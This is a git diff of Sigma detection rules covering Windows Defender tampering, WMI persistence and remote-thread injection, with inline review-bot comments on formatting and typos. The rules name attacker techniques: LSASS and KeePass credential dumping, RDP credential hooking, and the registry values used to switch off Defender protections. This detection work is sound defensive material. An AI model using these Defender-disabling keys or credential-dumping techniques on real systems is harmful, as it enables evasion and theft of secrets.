Defender/Operational selection: - EventID: 5101 + EventID: 5101 # The antimalware platform is expired. condition: windefend and selection falsepositives: - Unknown diff --git a/sigma/builtin/windefend/win_defender_asr_lsass_access.yml b/sigma/builtin/windefend/win_defender_asr_lsass_access.yml index 31bb77bab..35d1896fc 100644 --- a/sigma/builtin/windefend/win_defender_asr_lsass_access.yml +++ b/sigma/builtin/windefend/win_defender_asr_lsass_access.yml 
@@ -13,9 +13,7 @@ tags: logsource: product: windows service: windefend - definition: 'Requirements:Enabled Block credential stealing from the Windows local - security authority subsystem (lsass.exe) from Attack Surface Reduction (GUID: - 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2)' + definition: 'Requirements:Enabled Block credential stealing from the Windows local security authority subsystem (lsass.exe) from Attack Surface Reduction (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2)' detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational diff --git a/sigma/builtin/windefend/win_defender_asr_psexec_wmi.yml b/sigma/builtin/windefend/win_defender_asr_psexec_wmi.yml index 9549477a2..5ec0ca444 100644 --- a/sigma/builtin/windefend/win_defender_asr_psexec_wmi.yml +++ b/sigma/builtin/windefend/win_defender_asr_psexec_wmi.yml @@ -1,8 +1,7 @@ title: PSExec and WMI Process Creations Block id: 97b9ce1e-c5ab-11ea-87d0-0242ac130003 status: test -description: Detects blocking of process creations originating from PSExec and WMI - commands +description: Detects blocking of process creations originating from PSExec and WMI commands references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands - https://twitter.com/duff22b/status/1280166329660497920 @@ -17,8 +16,7 @@ tags: logsource: product: windows service: windefend - definition: 'Requirements:Enabled Block process creations originating from PSExec - and WMI commands from Attack Surface Reduction (GUID: d1e49aac-8f56-4280-b9ba-993a6d77406c)' + definition: 'Requirements:Enabled Block process creations originating from PSExec and WMI commands from Attack Surface Reduction (GUID: d1e49aac-8f56-4280-b9ba-993a6d77406c)' detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational 
diff --git a/sigma/builtin/windefend/win_defender_config_change_exclusion_added.yml b/sigma/builtin/windefend/win_defender_config_change_exclusion_added.yml index c1b80e8eb..0fd1164e0 100644 --- a/sigma/builtin/windefend/win_defender_config_change_exclusion_added.yml +++ b/sigma/builtin/windefend/win_defender_config_change_exclusion_added.yml @@ -17,7 +17,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 5007 + EventID: 5007 # The antimalware platform configuration changed. NewValue|contains: \Microsoft\Windows Defender\Exclusions condition: windefend and selection falsepositives: diff --git a/sigma/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml b/sigma/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml index 7e5202cb1..6fee59c58 100644 --- a/sigma/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml +++ b/sigma/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml @@ -1,10 +1,8 @@ title: Windows Defender Exploit Guard Tamper id: a3ab73f1-bd46-4319-8f06-4b20d0617886 status: test -description: 'Detects when someone is adding or removing applications or folders from - exploit guard "ProtectedFolders" or "AllowedApplications" - - ' +description: | + Detects when someone is adding or removing applications or folders from exploit guard "ProtectedFolders" or "AllowedApplications" references: - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 author: Nasreddine Bencherchali (Nextron Systems) 
@@ -20,20 +18,20 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational allowed_apps_key: - EventID: 5007 - NewValue|contains: \Windows Defender\Windows Defender Exploit Guard\Controlled - Folder Access\AllowedApplications\ + EventID: 5007 # The antimalware platform configuration changed. + NewValue|contains: \Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\AllowedApplications\ allowed_apps_path: NewValue|contains: + # Add more paths you don't allow in your org - \Users\Public\ - \AppData\Local\Temp\ - \Desktop\ - \PerfLogs\ - \Windows\Temp\ protected_folders: - EventID: 5007 - OldValue|contains: \Windows Defender\Windows Defender Exploit Guard\Controlled - Folder Access\ProtectedFolders\ + EventID: 5007 # The antimalware platform configuration changed. + # This will trigger on any folder removal. If you experience FP's then add another selection with specific paths + OldValue|contains: \Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\ProtectedFolders\ condition: windefend and (all of allowed_apps* or protected_folders) falsepositives: - Unlikely diff --git a/sigma/builtin/windefend/win_defender_config_change_sample_submission_consent.yml b/sigma/builtin/windefend/win_defender_config_change_sample_submission_consent.yml index 896474a69..46d1913d2 100644 --- a/sigma/builtin/windefend/win_defender_config_change_sample_submission_consent.yml +++ b/sigma/builtin/windefend/win_defender_config_change_sample_submission_consent.yml 
@@ -1,15 +1,14 @@ title: Windows Defender Submit Sample Feature Disabled id: 91903aba-1088-42ee-b680-d6d94fe002b0 related: - - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f - type: similar - - id: a3ab73f1-bd46-4319-8f06-4b20d0617886 - type: similar - - id: 801bd44f-ceed-4eb6-887c-11544633c0aa - type: similar + - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f + type: similar + - id: a3ab73f1-bd46-4319-8f06-4b20d0617886 + type: similar + - id: 801bd44f-ceed-4eb6-887c-11544633c0aa + type: similar status: stable -description: Detects disabling of the "Automatic Sample Submission" feature of Windows - Defender. +description: Detects disabling of the "Automatic Sample Submission" feature of Windows Defender. references: - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide - https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware @@ -25,7 +24,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 5007 + EventID: 5007 # The antimalware platform configuration changed. NewValue|contains: \Real-Time Protection\SubmitSamplesConsent = 0x0 condition: windefend and selection falsepositives: diff --git a/sigma/builtin/windefend/win_defender_history_delete.yml b/sigma/builtin/windefend/win_defender_history_delete.yml index b2656e6b6..87d454d7c 100644 --- a/sigma/builtin/windefend/win_defender_history_delete.yml +++ b/sigma/builtin/windefend/win_defender_history_delete.yml @@ -17,7 +17,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 1013 + EventID: 1013 # The antimalware platform deleted history of malware and other potentially unwanted software. condition: windefend and selection falsepositives: - Deletion of Defender malware detections history for legitimate reasons 
diff --git a/sigma/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml b/sigma/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml index b88e2fc26..5837256e1 100644 --- a/sigma/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml +++ b/sigma/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml @@ -1,16 +1,15 @@ title: Windows Defender Malware And PUA Scanning Disabled id: bc275be9-0bec-4d77-8c8f-281a2df6710f related: - - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 - type: obsoletes + - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 + type: obsoletes status: stable -description: Detects disabling of the Windows Defender feature of scanning for malware - and other potentially unwanted software +description: Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software references: - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5010 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ -author: "J\xE1n Tren\u010Dansk\xFD, frack113" +author: Ján Trenčanský, frack113 date: 2020/07/28 modified: 2023/11/22 tags: @@ -23,7 +22,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 5010 + EventID: 5010 # Scanning for malware and other potentially unwanted software is disabled. condition: windefend and selection falsepositives: - Unknown diff --git a/sigma/builtin/windefend/win_defender_malware_detected_amsi_source.yml b/sigma/builtin/windefend/win_defender_malware_detected_amsi_source.yml index 48f4f28f4..335bacbfc 100644 --- a/sigma/builtin/windefend/win_defender_malware_detected_amsi_source.yml +++ b/sigma/builtin/windefend/win_defender_malware_detected_amsi_source.yml 
@@ -17,7 +17,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 1116 + EventID: 1116 # The antimalware platform detected malware or other potentially unwanted software. SourceName: AMSI condition: windefend and selection falsepositives: diff --git a/sigma/builtin/windefend/win_defender_real_time_protection_disabled.yml b/sigma/builtin/windefend/win_defender_real_time_protection_disabled.yml index ada017bc6..6f2029cdc 100644 --- a/sigma/builtin/windefend/win_defender_real_time_protection_disabled.yml +++ b/sigma/builtin/windefend/win_defender_real_time_protection_disabled.yml @@ -1,19 +1,16 @@ title: Windows Defender Real-time Protection Disabled id: b28e58e4-2a72-4fae-bdee-0fbe904db642 related: - - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 - type: obsoletes + - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 + type: obsoletes status: stable -description: 'Detects disabling of Windows Defender Real-time Protection. As this - event doesn''t contain a lot of information on who initaited this action you might - want to reduce it to a "medium" level if this occurs too many times in your environment - - ' +description: | + Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initaited this action you might want to reduce it to a "medium" level if this occurs too many times in your environment references: - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5001 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ -author: "J\xE1n Tren\u010Dansk\xFD, frack113" +author: Ján Trenčanský, frack113 date: 2020/07/28 modified: 2023/11/22 tags: 
@@ -26,7 +23,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 5001 + EventID: 5001 # Real-time protection is disabled. condition: windefend and selection falsepositives: - Administrator actions (should be investigated) diff --git a/sigma/builtin/windefend/win_defender_real_time_protection_errors.yml b/sigma/builtin/windefend/win_defender_real_time_protection_errors.yml index 9626f506c..f952b1e6f 100644 --- a/sigma/builtin/windefend/win_defender_real_time_protection_errors.yml +++ b/sigma/builtin/windefend/win_defender_real_time_protection_errors.yml @@ -5,9 +5,8 @@ description: Detects issues with Windows Defender Real-Time Protection features references: - Internal Research - https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/ - - https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346 -author: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock '@securepeacock' - (Update) + - https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346 # Contains the list of Feature Names (use for filtering purposes) +author: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock '@securepeacock' (Update) date: 2023/03/28 modified: 2023/05/05 tags: 
@@ -21,16 +20,15 @@ detection: Channel: Microsoft-Windows-Windows Defender/Operational selection: EventID: - - 3002 - - 3007 + - 3002 # Real-Time Protection feature has encountered an error and failed + - 3007 # Real-time Protection feature has restarted filter_optional_network_inspection: - Feature_Name: '%%886' + Feature_Name: '%%886' # Network Inspection System Reason: - - '%%892' - - '%%858' + - '%%892' # The system is missing updates that are required for running Network Inspection System. Install the required updates and restart the device. + - '%%858' # Antimalware security intelligence has stopped functioning for an unknown reason. In some instances, restarting the service may resolve the problem. condition: windefend and (selection and not 1 of filter_optional_*) falsepositives: - - Some crashes can occur sometimes and the event doesn't provide enough information - to tune out these cases. Manual exception is required + - Some crashes can occur sometimes and the event doesn't provide enough information to tune out these cases. Manual exception is required level: medium ruletype: Sigma diff --git a/sigma/builtin/windefend/win_defender_restored_quarantine_file.yml b/sigma/builtin/windefend/win_defender_restored_quarantine_file.yml index 06f9e3fdb..0f5b15a1a 100644 --- a/sigma/builtin/windefend/win_defender_restored_quarantine_file.yml +++ b/sigma/builtin/windefend/win_defender_restored_quarantine_file.yml @@ -16,7 +16,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 1009 + EventID: 1009 # The antimalware platform restored an item from quarantine. condition: windefend and selection falsepositives: - Legitimate administrator activity restoring a file diff --git a/sigma/builtin/windefend/win_defender_suspicious_features_tampering.yml b/sigma/builtin/windefend/win_defender_suspicious_features_tampering.yml index f6390b2ec..d30c0f35e 100644 
--- a/sigma/builtin/windefend/win_defender_suspicious_features_tampering.yml +++ b/sigma/builtin/windefend/win_defender_suspicious_features_tampering.yml @@ -1,12 +1,12 @@ title: Windows Defender Configuration Changes id: 801bd44f-ceed-4eb6-887c-11544633c0aa related: - - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f - type: similar - - id: a3ab73f1-bd46-4319-8f06-4b20d0617886 - type: similar - - id: 91903aba-1088-42ee-b680-d6d94fe002b0 - type: similar + - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f + type: similar + - id: a3ab73f1-bd46-4319-8f06-4b20d0617886 + type: similar + - id: 91903aba-1088-42ee-b680-d6d94fe002b0 + type: similar status: stable description: Detects suspicious changes to the Windows Defender configuration references: @@ -25,13 +25,17 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 5007 + EventID: 5007 # The antimalware platform configuration changed. NewValue|contains: + # TODO: Add more suspicious values - '\Windows Defender\DisableAntiSpyware ' + # - '\Windows Defender\Features\TamperProtection ' # Might produce FP - '\Windows Defender\Scan\DisableRemovableDriveScanning ' - '\Windows Defender\Scan\DisableScanningMappedNetworkDrivesForFullScan ' - '\Windows Defender\SpyNet\DisableBlockAtFirstSeen ' - '\Real-Time Protection\SpyNetReporting ' + # Exclusions changes are covered in 1321dc4e-a1fe-481d-a016-52c45f0c8b4f + # Exploit guard changes are covered in a3ab73f1-bd46-4319-8f06-4b20d0617886 condition: windefend and selection falsepositives: - Administrator activity (must be investigated) diff --git a/sigma/builtin/windefend/win_defender_tamper_protection_trigger.yml b/sigma/builtin/windefend/win_defender_tamper_protection_trigger.yml index 4c48694c3..a3fae24f3 100644 --- a/sigma/builtin/windefend/win_defender_tamper_protection_trigger.yml +++ b/sigma/builtin/windefend/win_defender_tamper_protection_trigger.yml 
@@ -1,8 +1,7 @@ title: Microsoft Defender Tamper Protection Trigger id: 49e5bc24-8b86-49f1-b743-535f332c2856 status: stable -description: Detects blocked attempts to change any of Defender's settings such as - "Real Time Monitoring" and "Behavior Monitoring" +description: Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring" references: - https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide @@ -19,7 +18,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 5013 + EventID: 5013 # Tamper protection blocked a change to Microsoft Defender Antivirus. If Tamper protection is enabled then, any attempt to change any of Defender's settings is blocked. Event ID 5013 is generated and states which setting change was blocked. Value|endswith: - \Windows Defender\DisableAntiSpyware - \Windows Defender\DisableAntiVirus @@ -31,7 +30,6 @@ detection: - \Real-Time Protection\DisableScriptScanning condition: windefend and selection falsepositives: - - Administrator might try to disable defender features during testing (must be - investigated) + - Administrator might try to disable defender features during testing (must be investigated) level: high ruletype: Sigma diff --git a/sigma/builtin/windefend/win_defender_threat.yml b/sigma/builtin/windefend/win_defender_threat.yml index 6b5271f18..23d8f9b9b 100644 --- a/sigma/builtin/windefend/win_defender_threat.yml +++ b/sigma/builtin/windefend/win_defender_threat.yml 
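Review bot: The inline comment added to `EventID: 5013` in the `@@ -19,7 +18,7 @@` hunk is three sentences long and largely repeats the rule's own description ("Detects blocked attempts to change any of Defender's settings"), which makes the selection line hard to scan next to the one-line event comments used elsewhere in this commit. Keep the comment to the event meaning, `EventID: 5013 # Tamper protection blocked a change to Microsoft Defender Antivirus.`, and leave the explanation of when the event is raised to the description field.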
@@ -4,7 +4,7 @@ status: stable description: Detects actions taken by Windows Defender malware detection engines references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus -author: "J\xE1n Tren\u010Dansk\xFD" +author: Ján Trenčanský date: 2020/07/28 tags: - attack.execution @@ -17,10 +17,10 @@ detection: Channel: Microsoft-Windows-Windows Defender/Operational selection: EventID: - - 1006 - - 1015 - - 1116 - - 1117 + - 1006 # The antimalware engine found malware or other potentially unwanted software. + - 1015 # The antimalware platform detected suspicious behavior. + - 1116 # The antimalware platform detected malware or other potentially unwanted software. + - 1117 # he antimalware platform performed an action to protect your system from malware or other potentially unwanted software. condition: windefend and selection falsepositives: - Unlikely diff --git a/sigma/builtin/windefend/win_defender_virus_scan_disabled.yml b/sigma/builtin/windefend/win_defender_virus_scan_disabled.yml index bd5b6fc81..30f2a58c8 100644 --- a/sigma/builtin/windefend/win_defender_virus_scan_disabled.yml +++ b/sigma/builtin/windefend/win_defender_virus_scan_disabled.yml 
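Review bot: The comment added on the `1117` entry in the `@@ -17,10 +17,10 @@` hunk has lost its first letter: `# he antimalware platform performed an action …`. It should read `- 1117 # The antimalware platform performed an action to protect your system from malware or other potentially unwanted software.`, matching the wording of the other three entries in the list.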
@@ -1,15 +1,15 @@ title: Windows Defender Virus Scanning Feature Disabled id: 686c0b4b-9dd3-4847-9077-d6c1bbe36fcb related: - - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 - type: obsoletes + - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 + type: obsoletes status: stable description: Detects disabling of the Windows Defender virus scanning feature references: - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5012 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ -author: "J\xE1n Tren\u010Dansk\xFD, frack113" +author: Ján Trenčanský, frack113 date: 2020/07/28 modified: 2023/11/22 tags: @@ -22,7 +22,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 5012 + EventID: 5012 # Scanning for viruses is disabled. condition: windefend and selection falsepositives: - Unknown diff --git a/sigma/builtin/wmi/win_wmi_persistence.yml b/sigma/builtin/wmi/win_wmi_persistence.yml index e46af204a..6f6dd3fa1 100644 --- a/sigma/builtin/wmi/win_wmi_persistence.yml +++ b/sigma/builtin/wmi/win_wmi_persistence.yml @@ -1,8 +1,7 @@ title: WMI Persistence id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b status: test -description: Detects suspicious WMI event filter and command line event consumer based - on WMI and Security Logs. +description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. references: - https://twitter.com/mattifestation/status/899646620148539397 - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ 
@@ -16,8 +15,7 @@ tags: logsource: product: windows service: wmi - definition: WMI Namespaces Auditing and SACL should be configured, EventID 5861 - and 5859 detection requires Windows 10, 2012 and higher + definition: WMI Namespaces Auditing and SACL should be configured, EventID 5861 and 5859 detection requires Windows 10, 2012 and higher detection: wmi: Channel: Microsoft-Windows-WMI-Activity/Operational @@ -27,6 +25,7 @@ detection: - ActiveScriptEventConsumer - CommandLineEventConsumer - CommandLineTemplate + # - 'Binding EventFilter' # too many false positive with HP Health Driver wmi_filter_registration: EventID: 5859 filter_scmevent: @@ -34,8 +33,7 @@ detection: Query: select * from MSFT_SCMEventLogEvent User: S-1-5-32-544 PossibleCause: Permanent - condition: wmi and (( (wmi_filter_to_consumer_binding and consumer_keywords) or - (wmi_filter_registration) ) and not filter_scmevent) + condition: wmi and (( (wmi_filter_to_consumer_binding and consumer_keywords) or (wmi_filter_registration) ) and not filter_scmevent) falsepositives: - Unknown (data set is too small; further testing needed) level: medium diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml index af873d039..edf01ddae 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml @@ -3,7 +3,7 @@ id: 2e4e488a-6164-4811-9ea1-f960c7359c40 status: test description: Detects remote thread creation from CACTUSTORCH as described in references. references: - - https://twitter.com/SBousseaden/status/1090588499517079552 + - https://twitter.com/SBousseaden/status/1090588499517079552 # Deleted - https://github.com/mdsecactivebreach/CACTUSTORCH author: '@SBousseaden (detection), Thomas Patzke (rule)' date: 2019/02/01 
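Review bot: The disabled keyword added in the `@@ -27,6 +25,7 @@` hunk of win_wmi_persistence.yml carries a grammatical slip in its reason, `# too many false positive with HP Health Driver`; it should read `# - 'Binding EventFilter' # too many false positives with HP Health Driver`. Recording the reason is the right call, since it tells a maintainer why coverage of consumer bindings is deliberately reduced.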
@@ -31,7 +31,7 @@ detection: - \winword.exe - \excel.exe TargetImage|contains: \SysWOW64\ - StartModule: null + StartModule: condition: create_remote_thread and selection falsepositives: - Unknown diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml index 419b52f26..91ab38f51 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml @@ -1,8 +1,7 @@ title: HackTool - Potential CobaltStrike Process Injection id: 6309645e-122d-4c5b-bb2b-22e4f9c2fa42 status: test -description: Detects a potential remote threat creation with certain characteristics - which are typical for Cobalt Strike beacons +description: Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons references: - https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f - https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/ diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_keepass.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_keepass.yml index acd84c973..5b3796de5 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_keepass.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_keepass.yml @@ -1,8 +1,7 @@ title: Remote Thread Created In KeePass.EXE id: 77564cc2-7382-438b-a7f6-395c2ae53b9a status: experimental -description: Detects remote thread creation in "KeePass.exe" which could indicates - potential password dumping activity +description: Detects remote thread creation in "KeePass.exe" which could indicates potential password dumping activity references: - https://www.cisa.gov/uscert/ncas/alerts/aa20-259a - https://github.com/denandz/KeeFarce 
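Review bot: `StartModule: null` has been shortened to `StartModule:` with an empty value. YAML parses both as null, so the match itself is unchanged, but the explicit form makes the intent visible to a reader who does not know that an empty scalar is null; consider keeping `StartModule: null`. If the empty form is a deliberate convention for this tree, a short comment on that line such as `# empty value: field must be null/absent` would document it.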
diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_loadlibrary.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_loadlibrary.yml index 2a124a42f..927878752 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_loadlibrary.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_loadlibrary.yml @@ -1,8 +1,7 @@ title: CreateRemoteThread API and LoadLibrary id: 052ec6f6-1adc-41e6-907a-f1c813478bee status: test -description: Detects potential use of CreateRemoteThread api and LoadLibrary function - to inject DLL into a process +description: Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process references: - https://threathunterplaybook.com/hunts/windows/180719-DLLProcessInjectionCreateRemoteThread/notebook.html author: Roberto Rodriguez @Cyb3rWard0g diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml index e0305e49e..c01030681 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml 
@@ -1,13 +1,9 @@ title: Remote Thread Creation In Mstsc.Exe From Suspicious Location id: c0aac16a-b1e7-4330-bab0-3c27bb4987c7 status: experimental -description: 'Detects remote thread creation in the "mstsc.exe" process by a process - located in a potentially suspicious location. - - This technique is often used by attackers in order to hook some APIs used by DLLs - loaded by "mstsc.exe" during RDP authentications in order to steal credentials. - - ' +description: | + Detects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location. + This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials. references: - https://github.com/S12cybersecurity/RDPCredentialStealer/blob/1b8947cdd065a06c1b62e80967d3c7af895fcfed/APIHookInjectorBin/APIHookInjectorBin/Inject.h#L25 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml index 1e80c75fc..913167aa9 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml 
@@ -1,13 +1,9 @@ title: Password Dumper Remote Thread in LSASS id: f239b326-2f41-4d6b-9dfa-c846a60ef505 status: stable -description: 'Detects password dumper activity by monitoring remote thread creation - EventID 8 in combination with the lsass.exe process as TargetImage. - - The process in field Process is the malicious program. A single execution can - lead to hundreds of events. - - ' +description: | + Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. + The process in field Process is the malicious program. A single execution can lead to hundreds of events. references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm author: Thomas Patzke diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_lsass.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_lsass.yml index 0d2abbaca..4a56509c1 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_lsass.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_lsass.yml @@ -1,10 +1,10 @@ title: Potential Credential Dumping Attempt Via PowerShell Remote Thread id: fb656378-f909-47c1-8747-278bf09f4f4f related: - - id: 3f07b9d1-2082-4c56-9277-613a621983cc - type: obsoletes - - id: 0f920ebe-7aea-4c54-b202-9aa0c609cfe5 - type: similar + - id: 3f07b9d1-2082-4c56-9277-613a621983cc + type: obsoletes + - id: 0f920ebe-7aea-4c54-b202-9aa0c609cfe5 + type: similar status: test description: Detects remote thread creation by PowerShell processes into "lsass.exe" references: diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml index 93ad96f47..1ba5cae18 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml 
+++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml @@ -1,11 +1,10 @@ title: Remote Thread Creation Via PowerShell In Potentially Suspicious Target id: 99b97608-3e21-4bfe-8217-2a127c396a0e related: - - id: eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50 - type: similar + - id: eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50 + type: similar status: experimental -description: Detects the creation of a remote thread from a Powershell process in - a potentially suspicious target process +description: Detects the creation of a remote thread from a Powershell process in a potentially suspicious target process references: - https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html author: Florian Roth (Nextron Systems) @@ -29,6 +28,7 @@ detection: - \powershell.exe - \pwsh.exe TargetImage|endswith: + # Note: Please add additonal potential interesting targets to increase coverage - \rundll32.exe - \regsvr32.exe condition: create_remote_thread and selection diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_source_image.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_source_image.yml index 608990a48..560ec73ba 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_source_image.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_source_image.yml @@ -34,6 +34,7 @@ detection: - \find.exe - \findstr.exe - \forfiles.exe + # - '\git.exe' - \gpupdate.exe - \hh.exe - \iexplore.exe @@ -41,7 +42,7 @@ detection: - \lync.exe - \makecab.exe - \mDNSResponder.exe - - \monitoringhost.exe + - \monitoringhost.exe # Loads .NET CLR by default and thus a favorite for process injection for .NET in-memory offensive tools. - \msbuild.exe - \mshta.exe - \msiexec.exe 
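Review bot: The note added under `TargetImage|endswith:` in the `@@ -29,6 +28,7 @@` hunk of create_remote_thread_win_powershell_susp_targets.yml misspells "additional" and reads awkwardly: `# Note: Please add additonal potential interesting targets to increase coverage` should be `# Note: Please add additional potentially interesting targets to increase coverage`.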
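Review bot: The commented-out `# - '\git.exe'` entry in the `@@ -34,6 +34,7 @@` hunk of create_remote_thread_win_uncommon_source_image.yml gives no reason for being disabled, unlike the other disabled entry in this file that carries `# disabled due to false positives`. A reader cannot tell whether it was never validated or is known to be noisy; suggest `# - '\git.exe' # <reason it is disabled>`. The entry is also quoted while the active list items are unquoted (`- \gpupdate.exe`), so if it is ever re-enabled it should be written in the list's style.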
